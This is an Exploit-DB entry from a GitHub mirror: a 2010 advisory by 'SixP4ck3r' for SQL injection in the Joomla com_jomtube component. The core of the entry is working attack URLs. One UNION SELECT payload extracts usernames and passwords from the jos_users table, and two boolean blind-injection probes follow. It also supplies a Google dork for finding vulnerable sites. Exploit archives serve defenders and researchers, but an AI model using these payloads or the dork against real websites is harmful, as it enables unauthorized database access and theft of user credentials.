bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/14434.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

42 lines
No EOL
1.4 KiB
Text
Raw Blame History

===============================================================================
Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection
===============================================================================
Author : SixP4ck3r
Email & msn : SixP4ck3r@Bolivia.com
Date : 17 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
web : http://foro.nbsecurity.net/
Credits : Diablada and caporal is Bolivian!
Dork : inurl:com_jomtube
---------------------------------------------------------------------------
[Sofware afected info]
Joomla Component (com_jomtube)
[Download]
http://www.jomtube.com/
[Afected versions]
All versions + 0 day
---------------------------------------------------------------------------
[Exploting..Bug..Demo..]
[insert valid user_id=n]
http://example/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9
,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr
om+jos_users--&option=com_jomtube
[Blind SQL Injection]
http://example/index.php?view=videos&type=member&user_id=62+and+1=1--&option=com_jomtube
http://example/index.php?view=videos&type=member&user_id=62+and+1=0--&option=com_jomtube
---------------------------------------------------------------------------
With R3gards,
SixP4ck3r from Bolivia
___eof____
Reference in a new issue View git blame Copy permalink